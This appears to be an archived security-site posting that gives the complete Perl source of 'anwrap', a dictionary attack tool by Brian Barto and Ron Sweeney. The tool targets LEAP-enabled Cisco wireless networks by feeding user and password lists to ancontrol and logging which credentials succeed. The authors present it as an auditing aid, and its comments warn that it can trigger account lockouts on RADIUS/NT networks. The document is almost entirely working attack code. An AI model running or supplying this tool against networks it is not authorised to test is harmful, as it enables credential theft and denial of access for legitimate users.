|
|
|
|
| |
Credit:
The information has been provided by Brian Barto and Ron Sweeney.
|
| |
anwrap is a wrapper for ancontrol that serves as a dictionary attack tool against LEAP enabled Cisco Wireless Networks. It traverses a user list and password list attempting authentication and logging the results to a file.
Tool code:
#!/usr/bin/perl
#
# Version 0.1
# anwrap.pl is a wrapper for ancontrol that serves as a Dictionary
# attack tool against LEAP enabled Cisco Wireless Networks. Traverses
# a user list and password list attempting authentication and logging the
# results to a file. Really wrecks havoc on RADIUS calls to NT Networks that
# have lockout policies in place, you have been warned. Tweak the Timeouts,
# a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon.
# This tool was designed to audit authentication strengths before deploying LEAP in
# a production environment.
#
# Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away.
# Tested on FreeBSD 4.7.
#
# General Usage : $0 <userfile> <passwordfile> <logfile>
#
# Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org >
# November 2K02
use Expect ();
if ($#ARGV<0) {
&usage;
}
#setup some stuff
$userfile =$ARGV[0];
$passfile=$ARGV[1];
$logfile = $ARGV[2];
$date =`date`;
open(GAR, $passfile) or die "can't open password file, $passfile";
@GAR= <GAR>;
open(USER, "<$userfile") or die;
@users = <USER>;
close(USER);
open(FILE, ">>$logfile");
print FILE "\n\nScript started at $date \n\n";
close(FILE);
foreach $user (@users)
{
chop($user);
$auth_success = "no";
$end_of_passwords = "no";
$i = 0;
while ($auth_success eq "no" && $end_of_passwords eq "no")
{
$pass = $GAR[$i];
chop($pass);
local $/;
$p = Expect->spawn('ancontrol -L '.$user);
$p->expect(5, "assw") || die "Never recieved LEAP password";
print $p "$pass\r";
print $pass,"\n";
if ($p->expect(10, "uth"))
{
print "Success!\n";
open(FILE, ">>$logfile") or die;
print FILE "User: $user Password: $pass SUCCESS! ", "\n";
close(FILE);
$auth_success = "yes";
}
else
{
print "Failed\n";
open(FILE, ">>$logfile") or die;
print FILE "User: $user Password: $pass FAILED! ", "\n";
close(FILE);
}
$p->close();
if ($i == $#GAR) { $end_of_passwords = "yes"; }
else { $i++; }
}
}
sub usage {
print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n";
print "Ron Sweeney <sween\@modelm.org>\n";
print "Brian Barto <brian\@bartosoft.com>\n\n\n\n";
exit;
}
|
|
|
|
|
